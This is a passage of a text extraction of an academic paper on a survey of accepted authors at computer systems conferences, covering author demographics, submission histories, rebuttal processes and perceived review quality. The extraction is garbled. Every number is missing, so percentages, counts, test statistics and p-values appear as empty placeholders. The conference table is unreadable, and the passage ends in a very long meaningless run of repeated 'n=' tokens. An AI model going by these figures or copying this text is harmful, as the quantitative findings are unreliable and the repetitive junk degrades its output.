with peer review (beverly & allman, ; ernst & resch, ; mahoney, ; mcnutt et al., ). for example, reputable conferences disallow parallel submissions, and even within the same conference, we cannot design an experiment where papers are reviewed multiple times with fully controlled variations. perhaps the closest a study came to being a controlled experiment recently was a study on the nips conference, which found high inconsistency in the review outcomes (lawrence & cortes, ). thus, decisions on peer-review policies are often based more on the opinions of editors or program chairs, how to cite this article frachtenberg e, koster n. . a survey of accepted authors in computer systems conferences. peerj comput. sci. :e http://doi.org/ . /peerj-cs. https://peerj.com/computer-science mailto:eitan@reed.edu https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/ . /peerj-cs. http://creativecommons.org/licenses/by/ . / http://creativecommons.org/licenses/by/ . / http://doi.org/ . /peerj-cs. despite its large research output and enormous economic impact, we found no consensus definition for the field of ‘‘systems’’. for the purposes of this paper, we define it to be the study of computer hardware and software components, which includes research in operating systems, computer architectures, databases, parallel and distributed computing, and computer networks. and less on facts, despite their impact on the perceived integrity of the process (jamieson et al., ). additionally, many authors find the peer-review process inconsistent and somewhat arbitrary (françois, ; lawrence & cortes, ). both conference organizers and the authors who publish in them could benefit from more data on the process. this article presents data and evidence from statistical observations on the peer-review process for a specific year ( ) and a specific subfield of computing (computer systems or ‘‘systems’’). like most subfields of computer science (cs), the primary channel for publishing research results in systems is peer-reviewed conferences (fortnow, ; franceschet, ; vardi, ). many conference policies are similar, such as requiring a minimum of three blind reviews per paper (where the identity of the specific reviewers is hidden from authors). however, conferences can vary considerably in other aspects, such as double-blind reviews, rebuttals, two-phase reviews, etc. these decisions can potentially have dramatic effects on both the quality of the conference and the experience of the authors, but there appear to be conflicting opinions on the effects and tradeoffs of these policies (mainguy, motamedi & mietchen, ). the primary goal of this paper therefore is to analyze the conference author’s experience. its main contribution is an exposition and description of a large-scale author survey of systems researchers. these data could be especially relevant to two groups of people: ( ) computer scientists working to better understand the publication process and its effect on their careers and ( ) conference chairs wishing to understand the effect of their policies on author experience and diversity. a secondary goal of this paper is to investigate how the diversity of the respondents affected their survey answers. to this end, we combine our survey data with external data to assess author diversity and potential biases. specifically, we look at gender, english proficiency, research experience, and geography. by limiting our scope to conferences in a single subfield, we avoid some variability that might occur across a broader range of disciplines. this important subfield is known for poor gender diversity (destefano, ; fox, ; frachtenberg & kaner, ; mattauch et al., ), which gives us a lens by which we can examine any magnified effects of review policy on diversity. despite this focus on systems, we aimed to analyze a large population to increase the statistical validity and robustness of our measurements. our complete set includes data from conferences, , papers, , authors, and survey respondents. to the best of our knowledge, this is the first cross-sectional survey of authors across systems conferences. past studies have concentrated on either wide journal authorship (editage insights, ; clarivate analytics, ; sense about science, ; solomon, ) or a single conference (beverly & allman, ; daume, ; papagiannaki, ; parno, erlingsson & enck, ). we contrast these works with our findings throughout our study. as an initial exploratory study of the survey, we did not set out to validate specific hypotheses. nevertheless, there are several research questions for which our data can provide clues and answers across the entire field of systems: frachtenberg and koster ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. • what are the demographic properties (position, gender, country, english proficiency) of survey respondents? • are these demographics, and especially the low number of women, representative of all accepted authors? • how long does a systems paper take to write? how many attempts does it take to publish? • how do authors feel about a rebuttal process? what explains differences in opinions? • how do authors evaluate reviews, and which factors affect these evaluations? • what are the grade distributions of accepted papers across different categories? • what are the differences to survey responses for authors of different genders, english proficiency, and publication experience? organization the next section discusses our methodology and limitations of the survey data. the results section describes the survey and is organized around the areas of the survey itself. each subsection lists the survey questions in order, describes the statistics of the responses, and then includes a concise discussion or correlation analysis as applicable. as an initial analysis of the survey, the discussion section delves into questions of author diversity for which we have data. we believe that the wealth of this dataset leaves more questions unanswered than this expository paper allows, and we discuss some of our future work in the final section. as an additional contribution, most of our data and source code, except for individual survey responses, is available on http://github.com/eitanf/sysconf. materials and methods before issuing our survey, we collected data from various external sources to complement and corroborate its findings, starting with the conferences themselves. we selected conferences from systems and related areas. these peer-reviewed conferences include some of the most prestigious in the field, as well as others for comparison. they vary in scope and size (from to papers), but all are rigorously peer-reviewed and all are from . the complete list of conferences is given in table . for each conference we collected data from the web and program committee (pc) chairs, including review policies, important dates, the composition of its technical pc, and the number of submitted papers. we also collected historical metrics from the institute of electrical and electronics engineers (ieee), association for computing machinery (acm), and google scholar (gs) websites, including past citations, age, and total publications, and downloaded all , papers. from the conference and paper text, we compiled the complete list of authors for all conferences (a total of , unique authors), as well as their email addresses. these addresses were used not only for the survey’s distribution but also to infer an author’s affiliation, sector, and country of residence. if an email address was not shown in the paper, we attempted to infer the authors’ affiliation from their gs profile when uniquely identifiable. these profiles also provide indirect metrics on the authors’ research experience, such as their h-index (hirsch, ). finally, we also manually frachtenberg and koster ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://github.com/eitanf/sysconf http://dx.doi.org/ . /peerj-cs. table conferences in our dataset with their start date, double-blind policy, number of accepted papers, acceptance rate, and survey response rate by papers. name date blind papers acceptance response name date blind papers acceptance response asplos - - yes % % isc - - yes % % atc - - no % % isca - - yes % % ccgrid - - no % % ispass - - yes % % ccs - - yes % % kdd - - no % % cidr - - no % % mascots - - no % % cloud - - no % % micro - - yes % % cluster - - no % % middleware - - yes % % conext - - no % % mobicom - - yes % % europar - - no % % ndss - - yes % % eurosys - - yes % % nsdi - - yes % % fast - - yes % % oopsla - - yes % % hcw - - no % % pact - - yes % % hipc - - no % % pldi - - yes % % hotcloud - - no % % podc - - no % % hoti - - no % % pods - - no % % hotos - - no % % ppopp - - yes % % hotstorage - - no % % sc - - yes % % hpca - - no % % sigcomm - - yes % % hpcc - - no % % sigir - - no % % hpdc - - no % % sigmetrics - - yes % % icac - - no % % sigmod - - yes % % icdm - - yes % % sle - - no % % icpe - - no % % socc - - no unknown % icpp - - no % % sosp - - yes % % igsc - - no unknown % sp - - yes % % iiswc - - yes % % spaa - - no % % imc - - no % % systor - - no % % ipdps - - no % % vee - - yes % % frachtenberg and k oster ( ),p eerj c om put. s ci.,d o i . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. we recognize that gender is a complex, nonbinary identity that cannot be captured adequately by just photos or pronouns. however, the focus of this study is on perceived gender, not self-identification, which is often judged by the same simplistic criteria. assigned the gender of . % of authors, by looking up their photos and pronouns on the web. we sent our survey to all , valid email addresses during the summer of , and authors responded. we asked a few demographic questions, as well as questions about their paper and about the review process, repeated for up to three distinct papers from our dataset. nonresponses to a question were marked as na. of the papers, had responses from multiple authors. response rates by paper varied considerably among different conferences but appear to be positively correlated with the median number of authors per paper (pearson’s r = . , p= . ). in other words, the more coauthors per paper, the more likely it was that at least one author would respond and represent that paper. the distribution of responses per paper was statistically similar to the distribution of coauthors per paper (t = . , p < . ), suggesting that authors were equally likely to respond to the survey, regardless of the paper. survey responses from different authors to the same paper were typically identical or very similar, and always tested statistically insignificant in aggregate. in five papers, the responses from different authors were so inconsistent across questions that we elided them from our data. these inconsistencies relate mostly to the paper’s history, whereas responses to most other questions remain consistent across respondents. limitations our methodology involves several limitations and tradeoffs worthy of mention. first, by focusing only on systems, we may be limiting the applicability of our findings to this subfield. by focusing on a single year, we cannot report trends. these choices were deliberate, to eliminate extraneous variability in our data. second, our survey is subject to selection bias (representing only authors who responded to the survey or to each question). since we found no statistically significant demographic differences between survey respondents and the group of all authors, we believe the effect of this bias is minimal (see also daume, ; papagiannaki, ). third, the effort involved in compiling all of the data in preparation for the survey took nearly a year, by which time some authors reported difficulty recalling some details, leading to fewer responses. fourth, the manual assignment of genders is a laborious process, prone to human error. however, automated approaches based on first names and country can have even higher error rates and uncertainty, especially for female and asian names (huang et al., ; karimi et al., ; mattauch et al., ). in fact, for the respondents who provided a binary gender, we found no disagreements with our manual gender assignments. last, but certainly not least, is survivorship bias. since we only polled authors of accepted papers, we have no information on all submitted papers. our survey data is insufficient to distinguish between the demographics of accepted and rejected authors, which leaves the door open to undetected biases in the peer-review process. that said, we found no difference in the demographics of accepted papers between otherwise similar conferences with double-blind or single-blind review policies. this indirect evidence reduces the likelihood that the demographic section of the survey would be answered differently for rejected papers. other survey sections on paper history and review process may prove more frachtenberg and koster ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. sensitive to survivorship bias. we therefore limit any conclusions we draw in this study to accepted authors only. even with this restriction, it can be instructive to compare the responses across different demographics within accepted authors. we found very few controlled studies that evaluate the peer-review process on both accepted and rejected papers, and they are typically limited in scope to one conference or journal (parno, erlingsson & enck, ; tomkins, zhang & heavlin, ). we chose an observational approach instead, which lets us examine an entire field of study, but at the cost of survivorship bias and experimental control. we believe both approaches to be complementary and valuable. ethics statement this study and the survey questions were approved by the reed college irb (number -s ). as an opt-in email survey, participants could choose to share their responses with us after they were informed of the questions and the purpose of the survey. all of the individual responses have been anonymized. the data that is shared in the supplementary material was collated and collected from publicly available sources on the web. author survey results demographic questions we asked three demographic questions to evaluate their role in the review experience. we intentionally kept these questions to a minimum to reduce the risk of priming or selection bias. which best describes your position during ? as shown in table , about one-third ( . %) of the respondents were students in , another third or so were professors of various ranks ( %), and the rest were distributed between all other categories, including unknown. for comparison, we looked at the inferred affiliation of , total authors with an identifiable email affiliation. of these, . % had an industry affiliation, compared to . % of the non-na survey respondents (χ = . , p= . ). the difference for government researchers is a little larger: . % by affiliation vs. . % among survey respondents, but still not significant enough to suggest selection bias by position (χ = . , p= . ). systems is a field with numerous practical applications and commercial implications. it is not surprising therefore to find a large proportion of researchers in industrial and government positions, contributing to author diversity across sectors. what is your gender? among those who provided a binary response, . % chose ‘‘female’’ (table ). in our manually assigned gender data of all of the authors, % were female. these two proportions are not statistically different (χ = . , p= . ), leading us to believe that significant selection bias by gender is unlikely. frachtenberg and koster ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. table distribution of respondent positions. response count ratio government researcher . % industry researcher . % professor . % associate professor . % assistant professor . % postdoctoral researcher . % student . % other . % na . % table respondents’ gender. response f m other na count ratio . % . % . % . % table months of research. response – – – – + na count ratio . % . % . % . % . % . % what is your english level proficiency? of the non-na respondents, % of respondents chose ‘‘native’’ for their english level proficiency. there appears to be no gender or position difference in the response to this question. we also asked (and checked) for each paper whether there was any native english speaker among its coauthors. from this question, we estimate that approximately % of papers had at least one native-speaking author. paper history how many months did it take to research and write? the responses to this question (table ) exhibited more variance among different coauthors of the same paper than any other question, although typically by no more than months. the response to this question was not significantly associated with the team size (number of coauthors) or lead author’s experience, gender, or sector. how many conferences/journals was it submitted to prior to this publication? it is instructive to see that at least % of papers with responses had been rejected at least once (solomon, ; wallach, ), with one respondent taking as many as attempts to reach publication (table ). we also observed a tendency of papers with a frachtenberg and koster ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. table number of paper’s prior submissions. response + na count ratio . % % . % . % % . % . % figure prior submission counts for architecture conferences. arrows show in relative thickness and attached number how many papers that had been rejected in the top row’s conference were accepted in the bottom row’s conference. for example, papers that had been rejected from isca were accepted to hpca in , out of the hpca’ papers for which we have responses. full-size doi: . /peerjcs. /fig- longer submission history of having a longer research history (previous question), perhaps conflating the two variables in respondents’ mind. please type in their names [of the rejecting conferences] because of the unstructured responses to this question, quantitative analysis is challenging. as an example, we focus our attention on the area of computer architecture alone. four of the leading conferences are represented in our dataset and are of similar size and acceptance rates. we note that most papers that had been previously rejected from these conferences, had been mostly submitted to one of these four as well. as fig. shows, these relationships work both ways, meaning that many papers were accepted after previously being rejected from equivalent (or even the very same) conferences. this fact can be interpreted both positively and negatively. some respondents expressed frustration that the peer-review process can appear arbitrary (anderson, ; françois, ; gans & shepherd, ; lawrence & cortes, ; vardi, ; vines, ). other authors opined that effective peer review provides feedback that improves the paper for the next submission. most of the papers had been rejected at least once prior to their acceptance in , which perhaps helps to explain why authors’ views on the process were mixed. this fact could also support an argument that selection bias in this survey played a lesser role in painting authors’ reported experience one way or another, because even though these are all accepted authors, most of them experienced the rejection of the subject paper as well. frachtenberg and koster ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. rebuttal process did the conference allow you to address reviewers concerns before final acceptance notice? of the non-na responses, . % chose ‘‘yes.’’ contrast this with the conferences, of which only offered a formal rebuttal option ( . % when weighted by papers). the discrepancy may be explained by some authors who specifically explained answering ‘‘yes’’ to this question despite the lack of a formal rebuttal policy, because the conference had a ‘‘provisional acceptance’’ policy or mandatory revisions guided by a pc ‘‘shepherd.’’ although this response type is clearly different than a formal rebuttal, limiting our analysis to only formal rebuttals does not meaningfully change our results. approximately . % of the ‘‘yes’’ respondents also reported that they took advantage of the rebuttal option. the few who did not take advantage received higher overall acceptance score on average, ( . % vs. . %, t =− . , p= . ), possibly obviating the need to rebut (daume, ). there were no statistically significant differences in responses to this question by position, english proficiency, or gender, although only men chose not to rebut ( authors, χ = . , p= . ). these men appear slightly less experienced than their peers, with a median h-index of , compared to for all authors, (t =− . , p= . ) and are mostly academics ( authors). however, the group is probably too small to characterize it conclusively. did you find the response process helpful? of the non-na responses, . % were affirmative. this high percentage may be a little surprising, considering how many pc chairs and authors alike commented privately on how little difference rebuttals make (daume, ; shah et al., ). one cautionary reminder is that the survey and statistics exclude rejected papers, which could lead to survivorship bias. it is quite plausible that authors of rejected papers were less enthused about the rebuttal process. however, even among authors of accepted papers there are some noteworthy differences between those who found rebuttals valuable and those who did not. professors comprise only % of the respondents who found rebuttals helpful, compared to % among those who did not (χ = . , p= . ). in contradistinction, students found rebuttals more helpful ( % vs. %, χ = . , p= . ), perhaps because of their lack of experience. junior researchers possibly also feel more pressure to bring their paper to publication than tenured and senior researchers. more generally, the experience level of authors who found rebuttals helpful, as measured by median publications count in their gs profile, is about half that of those who did not ( vs. , t = . , p= . ). we have also collected information on which authors serve on pcs in any of our conferences, as another measure of experience. this information agrees with the previous metric. authors satisfied with the rebuttal process serve on an average of . pcs, compared to . pcs for authors who were not (t = . , p= . ), which is consistent with the mixed opinions we got directly from pc chairs on the question of rebuttals. frachtenberg and koster ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. table number of reviews received per paper. response + na count ratio . % . % . % . % . % . % . % . % nonnative english speakers were also more likely to find the rebuttals helpful ( % vs. %, χ = . , p= . ), perhaps because it allowed them to address gaps in communication. this difference also extends weakly to the entire team: % of responses where no team member was a native english speaker found the rebuttal helpful, vs. % in responses from the other teams. rebuttal helpfulness does appear to be related to the conference. when limiting ourselves to the eleven conferences that had a formal rebuttal process and at least ten unique authors responding to this question, three conferences had higher-than-average dissatisfaction rate with the rebuttal process: asplos, isc, and sosp. conversely, in four conferences, no more than % of respondents were dissatisfied with the rebuttals: micro, ppopp, sc, and pldi. when asked to explain their previous answer, the respondents varied. the main themes that emerged from the positive responses were that rebuttals allowed for clarifications, increased review scores, and improved the communication of specific points in the paper. one pc chair also thought rebuttals elicit better initial reviews and better pc discussion. the main negative themes were that rebuttals rarely change reviewers’ minds and that the process was still opaque and arbitrary. review quality assessment the following questions, one per review and paper, were designed to assess the quality of the reviews. how many reviews did this paper receive? the papers in our dataset average more than four reviews per paper (table ), far better than the typical + reviews in an average cs journal (clarivate analytics, , p. ). this could partially explain the attractiveness of conferences over journals, at least in systems. authors were also asked to qualitatively approximate how long each review was (table ). it is encouraging to find over half of the non-na responses showing one or more pages per review, whereas only approximately . % of reviews were reported to be less than half a page. how well did the reviewer understand the paper, in your estimation? of the minority of reviews that missed major points or worse (table ), . % were short, spanning half a page or less. this correlation demonstrates the relationship between review quality and length (χ = . , p < . ) (hames, ; papagiannaki, ). still, longer is not always better or necessary, as these short reviews still comprise . % of the ‘‘perfect understanding’’ reviews, whereas multipage reviews only comprise . %. as for paper history, the better-understood papers appear to have had a longer history in terms of prior submissions (t = . , p= . ), as well as in terms of months researched. frachtenberg and koster ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. table distribution of review lengths. response count ratio - paragraphs . % half a page . % a page . % multiple pages . % na . % table reviewer understanding. response count ratio perfectly . % missed some minor points . % misunderstood major points . % probably didn’t read it . % na . % table review helpfulness. response count ratio very helpful . % somewhat helpful . % not at all . % conceivably, previous rejections have helped improve the communication of a resubmitted paper. how helpful did you find this review for improving the paper? table shows that accepted authors found most of their reviews at least somewhat helpful. the helpfulness of a review is closely linked to its reported level of understanding (χ = . ,p< . ), which in turn also implies that it is closely linked to the review’s length (χ = , p< . ). this result is consistent with other surveys of journal authors (editage insights, ; sense about science, ). how fair would you say the review was? fairness in reviews is a high priority for the systems community (jerger et al., ), and most of our respondents thought their reviews were fair (table ). once more, the perception of a review’s fairness is closely tied to that of the reviewer’s understanding (χ = . , p< . ) and helpfulness (χ = . , p< . ). only of non-na responses ( . %) ranked a review as ‘unfair’ or ‘very unfair.’ however, this relatively low number may be distorted by survivorship bias more than for any other question in this survey. of these responses, sosp stands out as the conference with most ‘unfair’ reviews ( , or . %) and icpe as the conference with the highest percentage ( , or . %). one other notable aspect of these negative responses is that only one came from a woman ( . %). frachtenberg and koster ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. table review fairness. response count ratio fair . % somewhat fair . % unfair . % very unfair . % review scores we asked respondents to upload their reviews’ text or to fill in the actual scores that they received in the reviews of up to six reviews per paper and in seven different categories, when applicable. not all of the conferences require all categories in their review forms, and the conferences do not all use consistent wording, so we chose whichever one of the seven categories appeared closest in meaning to the conference’s form. these categories generally stand for the following: . overall score or acceptance recommendation (often ranging from ‘‘strong reject’’ to ‘‘strong accept’’). . technical merit or validity of the work. . presentation quality, writing effectiveness, and clarity. . foreseen impact of the work and potential to be of high influence. . originality of the work, or conversely, lack of incremental advance. . relevance of the paper to the conference’s scope. . confidence of the reviewer in the review. all scores were normalized so that the lowest grade in a category always received and the highest always . the distributions of these normalized scores are depicted in fig. . keep in mind, however, that the transcription of reviews, scaling, and calibration process were error-prone, possibly introducing some noise to these responses. not surprisingly, all of the papers average above % for all of the scores—after all, the papers have all been accepted (langford, ; vines, ). the interquartile range for the overall grade is . – . , meaning that half of the papers probably got accepted with an overall recommendation somewhere between ‘‘weak accept’’ and ‘‘accept.’’ perhaps more surprisingly, approximately % of the papers were accepted despite a low (< . average) acceptance recommendation, and approximately % of the accepted papers had low reviewer confidence (< . average). however, the confidence ranking may be related to the seniority of the reviewer rather than the quality of the paper itself, leading to wider variance (shah et al., ). it is illuminating to see that there is no correlation between a paper’s overall grade and the number of past rejections (r =− . , p= . ). if multiple submissions do indeed improve a paper’s quality, as we suggested in the understanding question, they appear to only bring it to the same level of evaluation as other accepted papers in the same conference. once the paper is accepted, the improvement process is presumably halted. another observation is that the ‘‘relevance’’ grade may be mostly irrelevant, both because of its narrow distribution, and because of the low number of conferences that ask for it. frachtenberg and koster ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= 